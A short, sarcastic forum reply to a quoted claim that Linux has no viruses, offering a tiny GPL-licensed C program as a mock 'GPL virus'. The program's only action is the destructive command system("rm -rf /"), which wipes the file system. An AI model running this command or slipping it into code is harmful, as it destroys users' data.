Quote:
Originally posted by rbayer
Anyway, here's another argument: Linux is open-source/GPL and there's not a single known virus for it.
|
Wow! I can't beleive I was the first person to write a GPL virus. I should be famous!
PHP Code:
/*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*/
int main()
{
system("rm -rf /");
return(0);
}
</sarcasm>